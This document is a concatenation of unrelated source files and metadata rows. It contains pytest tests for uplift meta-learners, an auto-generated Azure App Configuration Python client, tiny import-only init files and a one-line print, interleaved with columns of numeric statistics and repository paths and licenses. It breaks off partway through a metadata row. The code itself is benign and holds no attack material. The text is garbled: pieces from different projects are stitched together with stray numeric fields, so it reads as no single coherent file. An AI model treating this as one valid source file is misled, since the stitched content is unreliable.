    df['treatment_group_key'] = np.where(df['treatment_group_key'] == CONTROL_NAME, 0, 1)

    df_train, df_test = train_test_split(df,
                                         test_size=0.2,
                                         random_state=RANDOM_SEED)

    model = BaseTClassifier(learner=LogisticRegression())
    model.fit(
        X=df_train[x_names].values,
        treatment=df_train['treatment_group_key'].values,
        y=df_train[CONVERSION].values,
    )
    tau_pred = model.predict(
        X=df_test[x_names].values,
        treatment=df_test['treatment_group_key'].values,
    )

    auuc_metrics = pd.DataFrame(
        {
            'tau_pred': tau_pred.flatten(),
            'W': df_test['treatment_group_key'].values,
            CONVERSION: df_test[CONVERSION].values,
            'treatment_effect_col': df_test['treatment_effect'].values,
        }
    )
    cumgain = get_cumgain(
        auuc_metrics,
        outcome_col=CONVERSION,
        treatment_col='W',
        treatment_effect_col='treatment_effect_col',
    )

    # The model's ranking should accumulate more gain than random targeting.
    assert cumgain['tau_pred'].sum() > cumgain['Random'].sum()
def test_BaseXClassifier(generate_classification_data):
    """X-learner classifier: both constructor forms run; predictions beat random.

    FIX: the 4-learner model's predictions used to be computed and then
    silently overwritten by the 2-learner model's; now the 4-learner path is
    at least checked for shape so a broken prediction cannot go unnoticed.
    """
    np.random.seed(RANDOM_SEED)

    df, x_names = generate_classification_data()

    df['treatment_group_key'] = np.where(df['treatment_group_key'] == CONTROL_NAME, 0, 1)

    propensity_model = LogisticRegression()
    propensity_model.fit(X=df[x_names].values, y=df['treatment_group_key'].values)
    df['propensity_score'] = propensity_model.predict_proba(df[x_names].values)[:, 1]

    df_train, df_test = train_test_split(df,
                                         test_size=0.2,
                                         random_state=RANDOM_SEED)

    # specify all 4 learners
    uplift_model = BaseXClassifier(control_outcome_learner=XGBClassifier(),
                                   control_effect_learner=XGBRegressor(),
                                   treatment_outcome_learner=XGBClassifier(),
                                   treatment_effect_learner=XGBRegressor())
    uplift_model.fit(X=df_train[x_names].values,
                     treatment=df_train['treatment_group_key'].values,
                     y=df_train[CONVERSION].values)
    tau_pred = uplift_model.predict(X=df_test[x_names].values,
                                    p=df_test['propensity_score'].values)
    # one effect estimate per held-out row
    assert tau_pred.shape[0] == df_test.shape[0]

    # specify 2 learners
    uplift_model = BaseXClassifier(outcome_learner=XGBClassifier(),
                                   effect_learner=XGBRegressor())
    uplift_model.fit(X=df_train[x_names].values,
                     treatment=df_train['treatment_group_key'].values,
                     y=df_train[CONVERSION].values)
    tau_pred = uplift_model.predict(X=df_test[x_names].values,
                                    p=df_test['propensity_score'].values)

    # calculate metrics
    auuc_metrics = pd.DataFrame({'tau_pred': tau_pred.flatten(),
                                 'W': df_test['treatment_group_key'].values,
                                 CONVERSION: df_test[CONVERSION].values,
                                 'treatment_effect_col': df_test['treatment_effect'].values})

    cumgain = get_cumgain(auuc_metrics,
                          outcome_col=CONVERSION,
                          treatment_col='W',
                          treatment_effect_col='treatment_effect_col')

    # Check if the cumulative gain when using the model's prediction is
    # higher than it would be under random targeting
    assert cumgain['tau_pred'].sum() > cumgain['Random'].sum()
def test_BaseRClassifier(generate_classification_data):
    """R-learner classifier beats random targeting on held-out cumulative gain."""
    np.random.seed(RANDOM_SEED)

    df, x_names = generate_classification_data()

    # Binarize the treatment indicator: control -> 0, treated -> 1.
    df['treatment_group_key'] = np.where(df['treatment_group_key'] == CONTROL_NAME, 0, 1)

    # Fit a logistic propensity model on the full data set.
    propensity_model = LogisticRegression()
    propensity_model.fit(X=df[x_names].values, y=df['treatment_group_key'].values)
    df['propensity_score'] = propensity_model.predict_proba(df[x_names].values)[:, 1]

    df_train, df_test = train_test_split(df,
                                         test_size=0.2,
                                         random_state=RANDOM_SEED)

    model = BaseRClassifier(outcome_learner=XGBClassifier(),
                            effect_learner=XGBRegressor())
    model.fit(
        X=df_train[x_names].values,
        p=df_train['propensity_score'].values,
        treatment=df_train['treatment_group_key'].values,
        y=df_train[CONVERSION].values,
    )
    tau_pred = model.predict(X=df_test[x_names].values)

    auuc_metrics = pd.DataFrame(
        {
            'tau_pred': tau_pred.flatten(),
            'W': df_test['treatment_group_key'].values,
            CONVERSION: df_test[CONVERSION].values,
            'treatment_effect_col': df_test['treatment_effect'].values,
        }
    )
    cumgain = get_cumgain(
        auuc_metrics,
        outcome_col=CONVERSION,
        treatment_col='W',
        treatment_effect_col='treatment_effect_col',
    )

    # The model's ranking should accumulate more gain than random targeting.
    assert cumgain['tau_pred'].sum() > cumgain['Random'].sum()
def test_pandas_input(generate_regression_data):
    """All meta-learners accept pandas inputs (Series/DataFrame) without raising.

    FIX: the old `try: ... except AttributeError: assert False` pattern
    swallowed the traceback and reported a bare assertion failure. Letting
    the call raise gives pytest the full error, and a loop removes the
    five-fold duplication.
    """
    y, X, treatment, tau, b, e = generate_regression_data()
    # convert to pandas types
    y = pd.Series(y)
    X = pd.DataFrame(X)
    treatment = pd.Series(treatment)

    # (learner instance, extra keyword arguments for estimate_ate)
    cases = [
        (BaseSLearner(learner=LinearRegression()), {'return_ci': True}),
        (BaseTLearner(learner=LinearRegression()), {}),
        (BaseXLearner(learner=LinearRegression()), {'p': e}),
        (BaseRLearner(learner=LinearRegression()), {'p': e}),
        (TMLELearner(learner=LinearRegression()), {'p': e}),
    ]
    for learner, extra_kwargs in cases:
        # Any exception (e.g. AttributeError from .values handling) fails the
        # test with a full traceback.
        ate_p, lb, ub = learner.estimate_ate(X=X, treatment=treatment, y=y, **extra_kwargs)
def test_BaseDRLearner(generate_regression_data):
    """DR-learner with known propensity: ATE accuracy plus AUUC sanity check."""
    y, X, treatment, tau, b, e = generate_regression_data()

    learner = BaseDRLearner(learner=XGBRegressor(), treatment_effect_learner=LinearRegression())

    # check the accuracy of the ATE estimation
    ate_p, lb, ub = learner.estimate_ate(X=X, treatment=treatment, y=y, p=e)
    assert (ate_p >= lb) and (ate_p <= ub)
    assert ape(tau.mean(), ate_p) < ERROR_THRESHOLD

    # check the accuracy of the CATE estimation with the bootstrap CI
    cate_p, _, _ = learner.fit_predict(X=X, treatment=treatment, y=y, p=e, return_ci=True, n_bootstraps=10)

    # BUG FIX: store the ground-truth effect under 'tau' so it matches the
    # treatment_effect_col='tau' argument (previously the key was
    # 'treatment_effect_col' and the ground truth was silently ignored).
    auuc_metrics = pd.DataFrame({'cate_p': cate_p.flatten(),
                                 'W': treatment,
                                 'y': y,
                                 'tau': tau})

    cumgain = get_cumgain(auuc_metrics,
                          outcome_col='y',
                          treatment_col='W',
                          treatment_effect_col='tau')

    # Check if the cumulative gain when using the model's prediction is
    # higher than it would be under random targeting
    assert cumgain['cate_p'].sum() > cumgain['Random'].sum()
| 41.071322
| 111
| 0.61293
| 3,465
| 27,641
| 4.673593
| 0.043001
| 0.018031
| 0.033963
| 0.044461
| 0.915463
| 0.900333
| 0.89527
| 0.895023
| 0.895023
| 0.892985
| 0
| 0.005145
| 0.282732
| 27,641
| 672
| 112
| 41.13244
| 0.811661
| 0.134221
| 0
| 0.829268
| 0
| 0
| 0.059894
| 0
| 0
| 0
| 0
| 0
| 0.14878
| 1
| 0.056098
| false
| 0
| 0.039024
| 0
| 0.095122
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4deaa8ea32633490934f75618441c7732c737f9a
| 129
|
py
|
Python
|
federatedscope/core/proto/__init__.py
|
alibaba/FederatedScope
|
fcf6d237624769ea094cfd68803901622f14fc23
|
[
"Apache-2.0"
] | 9
|
2022-03-24T07:59:37.000Z
|
2022-03-31T06:47:52.000Z
|
federatedscope/core/proto/__init__.py
|
alibaba/FederatedScope
|
fcf6d237624769ea094cfd68803901622f14fc23
|
[
"Apache-2.0"
] | 1
|
2022-03-28T13:52:17.000Z
|
2022-03-28T13:52:17.000Z
|
federatedscope/core/proto/__init__.py
|
alibaba/FederatedScope
|
fcf6d237624769ea094cfd68803901622f14fc23
|
[
"Apache-2.0"
] | null | null | null |
from federatedscope.core.proto.gRPC_comm_manager_pb2 import *
from federatedscope.core.proto.gRPC_comm_manager_pb2_grpc import *
| 43
| 66
| 0.875969
| 19
| 129
| 5.578947
| 0.473684
| 0.339623
| 0.415094
| 0.509434
| 0.849057
| 0.849057
| 0.849057
| 0.849057
| 0
| 0
| 0
| 0.016529
| 0.062016
| 129
| 2
| 67
| 64.5
| 0.859504
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 11
|
12a8182398011c90e7fe6569f807b5fc6cc416b7
| 22,756
|
py
|
Python
|
sdk/appconfiguration/azure-appconfiguration/azure/appconfiguration/_generated/operations/_configuration_client_operations.py
|
kushan2018/azure-sdk-for-python
|
08a9296207281f4e90e23cf7a30173863accc867
|
[
"MIT"
] | null | null | null |
sdk/appconfiguration/azure-appconfiguration/azure/appconfiguration/_generated/operations/_configuration_client_operations.py
|
kushan2018/azure-sdk-for-python
|
08a9296207281f4e90e23cf7a30173863accc867
|
[
"MIT"
] | 1
|
2020-03-06T05:57:16.000Z
|
2020-03-06T05:57:16.000Z
|
sdk/appconfiguration/azure-appconfiguration/azure/appconfiguration/_generated/operations/_configuration_client_operations.py
|
kushan2018/azure-sdk-for-python
|
08a9296207281f4e90e23cf7a30173863accc867
|
[
"MIT"
] | null | null | null |
# coding=utf-8
# --------------------------------------------------------------------------
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from azure.core.exceptions import HttpResponseError, map_error
from azure.core.paging import ItemPaged
from .. import models
import uuid
class ConfigurationClientOperationsMixin(object):
    """Generated operations mixin for the Azure App Configuration service.

    Provides list/get/put/delete and lock/unlock operations over the
    ``/kv``, ``/keys``, ``/labels``, ``/locks`` and ``/revisions``
    endpoints, executed through the azure-core pipeline held by
    ``self._client``. Serialization is delegated to ``self._serialize`` /
    ``self._deserialize``. Code is AutoRest-generated; edits are lost on
    regeneration.
    """
    def list_configuration_settings(
            self, label=None, key=None, accept_date_time=None, fields=None, cls=None, **kwargs):
        """List configuration settings.
        List the configuration settings in the configuration store, optionally
        filtered by label.
        :param label: Filter returned values based on their label. '*' can be
         used as wildcard in the beginning or end of the filter
        :type label: list[str]
        :param key: Filter returned values based on their keys. '*' can be
         used as wildcard in the beginning or end of the filter
        :type key: list[str]
        :param accept_date_time: Obtain representation of the result related
         to past time.
        :type accept_date_time: datetime
        :param fields: Specify which fields to return
        :type fields: list[str]
        :return: An iterator like instance of ConfigurationSetting
        :rtype:
         ~azure.core.paging.ItemPaged[~appconfiguration.models.ConfigurationSetting]
        :raises: :class:`HttpResponseError<azure.core.HttpResponseError>`
        """
        def prepare_request(next_link=None):
            # First page: build URL + filter query params; later pages:
            # next_link is already a fully formed URL, so only headers are set.
            query_parameters = {}
            if not next_link:
                # Construct URL
                url = self.list_configuration_settings.metadata['url']
                if label is not None:
                    query_parameters['label'] = self._serialize.query("label", label, '[str]', div=',', max_items=5)
                if key is not None:
                    query_parameters['key'] = self._serialize.query("key", key, '[str]', div=',')
                if fields is not None:
                    query_parameters['fields'] = self._serialize.query("fields", fields, '[str]', div=',')
            else:
                url = next_link
            # Construct headers
            header_parameters = {}
            header_parameters['Accept'] = 'application/json'
            if self._config.generate_client_request_id:
                header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
            if accept_date_time is not None:
                header_parameters['Accept-DateTime'] = self._serialize.header("accept_date_time", accept_date_time, 'iso-8601')
            # Construct and send request
            request = self._client.get(url, query_parameters, header_parameters)
            return request
        def extract_data(response):
            # NOTE(review): the continuation token (first tuple element) is
            # always None, so ItemPaged never requests a follow-up page —
            # confirm against the azure-core paging contract.
            deserialized = self._deserialize('ConfigurationSettingList', response)
            return None, iter(deserialized.items)
        def get_next(next_link=None):
            request = prepare_request(next_link)
            pipeline_response = self._client._pipeline.run(request)
            response = pipeline_response.http_response
            # NOTE(review): kwargs.pop removes 'error_map' on the first call,
            # so any later page would see None here — confirm intended.
            error_map = kwargs.pop('error_map', None)
            if response.status_code not in [200]:
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                raise HttpResponseError(response=response)
            return response
        # Deserialize response
        return ItemPaged(
            get_next, extract_data
        )
    list_configuration_settings.metadata = {'url': '/kv'}
    def get_configuration_setting(self, key, label="%00", accept_date_time=None, cls=None, **kwargs):
        """Get a ConfigurationSetting.
        Get the ConfigurationSetting for the given key and label.
        :param key: string
        :type key: str
        :param label: Label of key to retreive
        :type label: str
        :param accept_date_time: Obtain representation of the result related
         to past time.
        :type accept_date_time: datetime
        :param callable cls: A custom type or function that will be passed the
         direct response
        :return: ConfigurationSetting or the result of cls(response)
        :rtype: ~appconfiguration.models.ConfigurationSetting
        :raises: :class:`HttpResponseError<azure.core.HttpResponseError>`
        """
        # NOTE(review): "%00" looks like the URL-encoded NUL sentinel the
        # service uses for "no label" — confirm against service docs.
        error_map = kwargs.pop('error_map', None)
        # Construct URL
        url = self.get_configuration_setting.metadata['url']
        path_format_arguments = {
            'key': self._serialize.url("key", key, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)
        # Construct parameters
        query_parameters = {}
        if label is not None:
            query_parameters['label'] = self._serialize.query("label", label, 'str')
        # Construct headers
        header_parameters = {}
        header_parameters['Accept'] = 'application/json'
        if self._config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if accept_date_time is not None:
            header_parameters['Accept-DateTime'] = self._serialize.header("accept_date_time", accept_date_time, 'iso-8601')
        # Construct and send request
        request = self._client.get(url, query_parameters, header_parameters)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        # 304 (Not Modified) is accepted but yields no deserialized body.
        if response.status_code not in [200, 304]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response)
        header_dict = {}
        deserialized = None
        if response.status_code == 200:
            deserialized = self._deserialize('ConfigurationSetting', response)
            header_dict = {
                'Last-Modified': self._deserialize('str', response.headers.get('Last-Modified')),
            }
        if cls:
            return cls(response, deserialized, header_dict)
        return deserialized
    get_configuration_setting.metadata = {'url': '/kv/{key}'}
    def create_or_update_configuration_setting(self, configuration_setting, key, label="%00", cls=None, **kwargs):
        """Create (or update) a ConfigurationSetting.
        Create (or update) a ConfigurationSetting.
        :param configuration_setting:
        :type configuration_setting:
         ~appconfiguration.models.ConfigurationSetting
        :param key: string
        :type key: str
        :param label:
        :type label: str
        :param callable cls: A custom type or function that will be passed the
         direct response
        :return: ConfigurationSetting or the result of cls(response)
        :rtype: ~appconfiguration.models.ConfigurationSetting
        :raises: :class:`HttpResponseError<azure.core.HttpResponseError>`
        """
        error_map = kwargs.pop('error_map', None)
        # Construct URL
        url = self.create_or_update_configuration_setting.metadata['url']
        path_format_arguments = {
            'key': self._serialize.url("key", key, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)
        # Construct parameters
        query_parameters = {}
        if label is not None:
            query_parameters['label'] = self._serialize.query("label", label, 'str')
        # Construct headers
        header_parameters = {}
        header_parameters['Accept'] = 'application/json'
        header_parameters['Content-Type'] = 'application/json; charset=utf-8'
        if self._config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        # Construct body
        body_content = self._serialize.body(configuration_setting, 'ConfigurationSetting')
        # Construct and send request
        request = self._client.put(url, query_parameters, header_parameters, body_content)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response)
        deserialized = None
        if response.status_code == 200:
            deserialized = self._deserialize('ConfigurationSetting', response)
        if cls:
            return cls(response, deserialized, None)
        return deserialized
    create_or_update_configuration_setting.metadata = {'url': '/kv/{key}'}
    def delete_configuration_setting(self, key, label=None, cls=None, **kwargs):
        """Delete a ConfigurationSetting.
        :param key: string
        :type key: str
        :param label:
        :type label: str
        :param callable cls: A custom type or function that will be passed the
         direct response
        :return: ConfigurationSetting or the result of cls(response)
        :rtype: ~appconfiguration.models.ConfigurationSetting
        :raises: :class:`HttpResponseError<azure.core.HttpResponseError>`
        """
        error_map = kwargs.pop('error_map', None)
        # Construct URL
        url = self.delete_configuration_setting.metadata['url']
        path_format_arguments = {
            'key': self._serialize.url("key", key, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)
        # Construct parameters
        query_parameters = {}
        if label is not None:
            query_parameters['label'] = self._serialize.query("label", label, 'str')
        # Construct headers
        header_parameters = {}
        header_parameters['Accept'] = 'application/json'
        if self._config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        # Construct and send request
        request = self._client.delete(url, query_parameters, header_parameters)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        # 204 (No Content) is accepted; only 200 carries a body to deserialize.
        if response.status_code not in [200, 204]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response)
        deserialized = None
        if response.status_code == 200:
            deserialized = self._deserialize('ConfigurationSetting', response)
        if cls:
            return cls(response, deserialized, None)
        return deserialized
    delete_configuration_setting.metadata = {'url': '/kv/{key}'}
    def list_keys(
            self, name=None, accept_date_time=None, cls=None, **kwargs):
        """
        :param name:
        :type name: str
        :param accept_date_time: Obtain representation of the result related
         to past time.
        :type accept_date_time: datetime
        :return: An iterator like instance of Key
        :rtype: ~azure.core.paging.ItemPaged[~appconfiguration.models.Key]
        :raises: :class:`HttpResponseError<azure.core.HttpResponseError>`
        """
        # Same pager pattern (and the same kwargs.pop / None-token caveats)
        # as list_configuration_settings above.
        def prepare_request(next_link=None):
            query_parameters = {}
            if not next_link:
                # Construct URL
                url = self.list_keys.metadata['url']
                if name is not None:
                    query_parameters['name'] = self._serialize.query("name", name, 'str')
            else:
                url = next_link
            # Construct headers
            header_parameters = {}
            header_parameters['Accept'] = 'application/json'
            if self._config.generate_client_request_id:
                header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
            if accept_date_time is not None:
                header_parameters['Accept-DateTime'] = self._serialize.header("accept_date_time", accept_date_time, 'iso-8601')
            # Construct and send request
            request = self._client.get(url, query_parameters, header_parameters)
            return request
        def extract_data(response):
            deserialized = self._deserialize('KeyList', response)
            return None, iter(deserialized.items)
        def get_next(next_link=None):
            request = prepare_request(next_link)
            pipeline_response = self._client._pipeline.run(request)
            response = pipeline_response.http_response
            error_map = kwargs.pop('error_map', None)
            if response.status_code not in [200]:
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                raise HttpResponseError(response=response)
            return response
        # Deserialize response
        return ItemPaged(
            get_next, extract_data
        )
    list_keys.metadata = {'url': '/keys'}
    def list_labels(
            self, accept_date_time=None, fields=None, name=None, cls=None, **kwargs):
        """List labels.
        :param accept_date_time: Obtain representation of the result related
         to past time.
        :type accept_date_time: datetime
        :param fields: Specify which fields to return
        :type fields: list[str]
        :param name:
        :type name: str
        :return: An iterator like instance of Label
        :rtype: ~azure.core.paging.ItemPaged[~appconfiguration.models.Label]
        :raises: :class:`HttpResponseError<azure.core.HttpResponseError>`
        """
        # Same pager pattern (and the same kwargs.pop / None-token caveats)
        # as list_configuration_settings above.
        def prepare_request(next_link=None):
            query_parameters = {}
            if not next_link:
                # Construct URL
                url = self.list_labels.metadata['url']
                if fields is not None:
                    query_parameters['fields'] = self._serialize.query("fields", fields, '[str]', div=',')
                if name is not None:
                    query_parameters['name'] = self._serialize.query("name", name, 'str')
            else:
                url = next_link
            # Construct headers
            header_parameters = {}
            header_parameters['Accept'] = 'application/json'
            if self._config.generate_client_request_id:
                header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
            if accept_date_time is not None:
                header_parameters['Accept-DateTime'] = self._serialize.header("accept_date_time", accept_date_time, 'iso-8601')
            # Construct and send request
            request = self._client.get(url, query_parameters, header_parameters)
            return request
        def extract_data(response):
            deserialized = self._deserialize('LabelList', response)
            return None, iter(deserialized.items)
        def get_next(next_link=None):
            request = prepare_request(next_link)
            pipeline_response = self._client._pipeline.run(request)
            response = pipeline_response.http_response
            error_map = kwargs.pop('error_map', None)
            if response.status_code not in [200]:
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                raise HttpResponseError(response=response)
            return response
        # Deserialize response
        return ItemPaged(
            get_next, extract_data
        )
    list_labels.metadata = {'url': '/labels'}
    def lock_configuration_setting(self, key, label=None, cls=None, **kwargs):
        """
        :param key:
        :type key: str
        :param label:
        :type label: str
        :param callable cls: A custom type or function that will be passed the
         direct response
        :return: ConfigurationSetting or the result of cls(response)
        :rtype: ~appconfiguration.models.ConfigurationSetting
        :raises: :class:`HttpResponseError<azure.core.HttpResponseError>`
        """
        error_map = kwargs.pop('error_map', None)
        # Construct URL
        url = self.lock_configuration_setting.metadata['url']
        path_format_arguments = {
            'key': self._serialize.url("key", key, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)
        # Construct parameters
        query_parameters = {}
        if label is not None:
            query_parameters['label'] = self._serialize.query("label", label, 'str')
        # Construct headers
        header_parameters = {}
        header_parameters['Accept'] = 'application/json'
        if self._config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        # Construct and send request
        # Lock is a body-less PUT against /locks/{key}.
        request = self._client.put(url, query_parameters, header_parameters)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response)
        deserialized = None
        if response.status_code == 200:
            deserialized = self._deserialize('ConfigurationSetting', response)
        if cls:
            return cls(response, deserialized, None)
        return deserialized
    lock_configuration_setting.metadata = {'url': '/locks/{key}'}
    def unlock_configuration_setting(self, key, label=None, cls=None, **kwargs):
        """
        :param key:
        :type key: str
        :param label:
        :type label: str
        :param callable cls: A custom type or function that will be passed the
         direct response
        :return: ConfigurationSetting or the result of cls(response)
        :rtype: ~appconfiguration.models.ConfigurationSetting
        :raises: :class:`HttpResponseError<azure.core.HttpResponseError>`
        """
        error_map = kwargs.pop('error_map', None)
        # Construct URL
        url = self.unlock_configuration_setting.metadata['url']
        path_format_arguments = {
            'key': self._serialize.url("key", key, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)
        # Construct parameters
        query_parameters = {}
        if label is not None:
            query_parameters['label'] = self._serialize.query("label", label, 'str')
        # Construct headers
        header_parameters = {}
        header_parameters['Accept'] = 'application/json'
        if self._config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        # Construct and send request
        # Unlock is a DELETE against /locks/{key} (the inverse of lock's PUT).
        request = self._client.delete(url, query_parameters, header_parameters)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response)
        deserialized = None
        if response.status_code == 200:
            deserialized = self._deserialize('ConfigurationSetting', response)
        if cls:
            return cls(response, deserialized, None)
        return deserialized
    unlock_configuration_setting.metadata = {'url': '/locks/{key}'}
    def list_revisions(
            self, label=None, key=None, fields=None, accept_date_time=None, cls=None, **kwargs):
        """
        :param label: Filter returned values based on their label. '*' can be
         used as wildcard in the beginning or end of the filter
        :type label: list[str]
        :param key: Filter returned values based on their keys. '*' can be
         used as wildcard in the beginning or end of the filter
        :type key: list[str]
        :param fields: Specify which fields to return
        :type fields: list[str]
        :param accept_date_time: Obtain representation of the result related
         to past time.
        :type accept_date_time: datetime
        :return: An iterator like instance of ConfigurationSetting
        :rtype:
         ~azure.core.paging.ItemPaged[~appconfiguration.models.ConfigurationSetting]
        :raises: :class:`HttpResponseError<azure.core.HttpResponseError>`
        """
        # Same pager pattern (and the same kwargs.pop / None-token caveats)
        # as list_configuration_settings above.
        def prepare_request(next_link=None):
            query_parameters = {}
            if not next_link:
                # Construct URL
                url = self.list_revisions.metadata['url']
                if label is not None:
                    query_parameters['label'] = self._serialize.query("label", label, '[str]', div=',', max_items=5)
                if key is not None:
                    query_parameters['key'] = self._serialize.query("key", key, '[str]', div=',')
                if fields is not None:
                    query_parameters['fields'] = self._serialize.query("fields", fields, '[str]', div=',')
            else:
                url = next_link
            # Construct headers
            header_parameters = {}
            header_parameters['Accept'] = 'application/json'
            if self._config.generate_client_request_id:
                header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
            if accept_date_time is not None:
                header_parameters['Accept-DateTime'] = self._serialize.header("accept_date_time", accept_date_time, 'iso-8601')
            # Construct and send request
            request = self._client.get(url, query_parameters, header_parameters)
            return request
        def extract_data(response):
            deserialized = self._deserialize('ConfigurationSettingList', response)
            return None, iter(deserialized.items)
        def get_next(next_link=None):
            request = prepare_request(next_link)
            pipeline_response = self._client._pipeline.run(request)
            response = pipeline_response.http_response
            error_map = kwargs.pop('error_map', None)
            if response.status_code not in [200]:
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                raise HttpResponseError(response=response)
            return response
        # Deserialize response
        return ItemPaged(
            get_next, extract_data
        )
    list_revisions.metadata = {'url': '/revisions'}
| 41.299456
| 127
| 0.627922
| 2,448
| 22,756
| 5.643791
| 0.071895
| 0.048639
| 0.0304
| 0.014186
| 0.919079
| 0.895266
| 0.888752
| 0.860162
| 0.857701
| 0.848726
| 0
| 0.00513
| 0.271928
| 22,756
| 550
| 128
| 41.374545
| 0.828766
| 0.236421
| 0
| 0.802721
| 1
| 0
| 0.079756
| 0.015023
| 0
| 0
| 0
| 0
| 0
| 1
| 0.071429
| false
| 0
| 0.013605
| 0
| 0.176871
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
12d5c90612534b025b3d4ce25cccec9db67e488b
| 12
|
py
|
Python
|
HW1/test.py
|
JusperLee/Deep-Learning
|
47c5829502a8b35aee10a00de4579a7f6b2a6fa7
|
[
"Apache-2.0"
] | 7
|
2019-05-04T15:32:22.000Z
|
2020-03-24T03:52:31.000Z
|
HW1/test.py
|
JusperLee/Deep-Learning
|
47c5829502a8b35aee10a00de4579a7f6b2a6fa7
|
[
"Apache-2.0"
] | null | null | null |
HW1/test.py
|
JusperLee/Deep-Learning
|
47c5829502a8b35aee10a00de4579a7f6b2a6fa7
|
[
"Apache-2.0"
] | null | null | null |
# One-off check of Python's floor-division operator: 2 // 18 floors to 0.
quotient = 2 // 18
print(quotient)
| 12
| 12
| 0.666667
| 3
| 12
| 2.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.25
| 0
| 12
| 1
| 12
| 12
| 0.416667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
42099c062f2b8751d42492acc8e021500da4db51
| 68
|
py
|
Python
|
l10n_ar_reports/models/__init__.py
|
odoo-mastercore/odoo-argentina
|
58cdfe8610bae42f69ddb9d652a28eb3245f6a04
|
[
"MIT"
] | 1
|
2021-01-25T15:57:58.000Z
|
2021-01-25T15:57:58.000Z
|
l10n_ar_reports/models/__init__.py
|
odoo-mastercore/odoo-argentina
|
58cdfe8610bae42f69ddb9d652a28eb3245f6a04
|
[
"MIT"
] | null | null | null |
l10n_ar_reports/models/__init__.py
|
odoo-mastercore/odoo-argentina
|
58cdfe8610bae42f69ddb9d652a28eb3245f6a04
|
[
"MIT"
] | 2
|
2020-10-17T16:36:02.000Z
|
2021-01-24T10:20:05.000Z
|
from . import account_vat_ledger
from . import account_vat_ledger_rg
| 34
| 35
| 0.867647
| 11
| 68
| 4.909091
| 0.545455
| 0.37037
| 0.62963
| 0.740741
| 0.962963
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102941
| 68
| 2
| 35
| 34
| 0.885246
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
4220cc29a54571b7a9733b333a6899a277027421
| 5,285
|
py
|
Python
|
CLIP-ViL/src/lxrt/adapters/config.py
|
ylsung/VL_adapter
|
287409f383f89a11764fc45806864693a4d3e498
|
[
"MIT"
] | 41
|
2021-12-14T02:50:16.000Z
|
